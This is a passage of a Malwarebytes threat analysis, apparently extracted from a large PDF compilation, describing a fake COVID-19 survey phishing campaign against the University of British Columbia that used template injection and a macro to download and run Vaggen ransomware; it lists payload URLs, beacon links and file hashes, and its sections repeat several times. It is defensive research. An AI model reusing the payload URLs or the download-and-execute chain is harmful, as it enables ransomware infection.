Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1292 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1293 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1294 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1295 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1296 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1297 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1298 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1299 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1300 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1301 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1302 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1303 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1304 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1305 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1306 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1307 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1308 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1309 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1310 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1311 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1312 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1313 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1314 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1315 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1316 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1317 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1318 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1319 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1320 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1321 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1322 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1323 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1324 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1325 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a 